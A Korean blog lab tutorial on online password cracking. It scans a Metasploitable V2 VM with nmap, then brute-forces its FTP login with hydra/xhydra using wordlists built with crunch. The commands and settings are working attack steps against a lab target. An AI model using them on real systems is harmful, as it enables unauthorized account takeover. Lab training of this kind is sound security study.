[실습] 칼리 리눅스 사용하기
■ 사용시스템
- Metasploitable V2 Linux
- KaliLinux
온라인(Online) 패스워드 크랙(Crack)하기(Remote Password Attack)
(GUI) xhydra(hydra-gtk),
(CLI) hydra 툴을 사용해 보자.
■ 프로그램 사용방법
Password Attacks > ONline Attacks > hydra-gtk (hydra)
or
# hydra
(작업 시나리오)
(KaliLinux(hydra)) --- password crack ---> (Metasploitable V2 Linux(ftpd))
(KaliLinux)
① Meta 서버의 포트 스캔
# nmap -sV -O -F 192.168.10.134 Metasploitable V2 Linux IP : 192.168.10.134
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-22 17:25 KST Nmap scan report for 192.168.10.134 Host is up (0.00053s latency). Not shown: 82 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 513/tcp open login? 514/tcp open tcpwrapped 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) MAC Address: 00:0C:29:FA:DD:2A (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds |
[참고] hydra
# hydra -l mfsadmin -P <암호 사전 파일> <타켓> <프로토콜>
or
# xhydra
■ xhydra
(GUI) xhydra
(TUI) hydra CMD
# xhydra &
-> 생성된 사전 파일을 가지고 작업한다.
-> 사전 파일을 생성하고 크랙하는 과정은 아래 [참고] 내용을 확인한다.
=======================================================================
Target 탭
Target
single target : 192.168.10.134
port : 21
protocol : ftp
Output Options
[ v ] Show Attempts
Passwords 탭
Username : user1
Password : [ v ] Password list : (사전 파일은 아래 [참고]에서 만들어진 파일 사용)
Start 탭
왼쪽 하단 부분에 "Start"
=======================================================================
[참고] Kali Linux 서버에서 사전파일을 생성하고 FTP 통해 user1 사용자의 패스워드를 크랙한다.
(Metasploitable V2 Linux)
서버에서 아이디/패스가 쉬운 사용자(EX: user1)를 만든다.
$ sudo useradd -m -s /bin/bash user1 (/etc/sudoers)
$ sudo passwd user1
$ cat /etc/passwd
$ sudo cat /etc/shadow
$ ftp localhost 21
user1/user1
> quit
(KaliLinux)
# cd /root/bin
[참고] 출력 내용 확인
# crunch 1 3
-> 출력 내용을 확인한다.
# crunch 1 3 ' a1'
-> 출력 내용을 확인한다.
[참고] 사전 파일 만드는 방법
인터넷상에 받은 사전 파일 : a.txt
직접 만든 사전 파일 : b.txt
# cat a.txt b.txt | sort -u > c.txt
# crunch 1 5 user1 > user.list (# crunch 1 5 user1 | head -1000 > user.list)
# cat user.list
# grep --color user1 user.list
# xhydra
username : user1
passwd list : /root/bin/user.list
(Meta)
$ sudo cat /var/log/vsftpd.log ($ sudo tail -f /var/log/vsftpd.log)
$ sudo cat /var/log/auth.log ($ sudo tail -f /var/log/auth.log)
다음 사이트에서 brute force attack 통해 암호가 얼마의 시간안에 크랙이 되는지 계산해 보자.
http://lastbit.com/pswcalc.asp
'Learning > └◆Network Hacking' 카테고리의 다른 글
네트워크 해킹 - 01. MAC 주소 검색 & 이더넷 프레임 구조 (0) | 2017.01.22 |
---|---|
searchsploit (Exploit DB) (0) | 2017.01.09 |
John The Ripper (0) | 2017.01.09 |
패스워드 크랙 (0) | 2017.01.09 |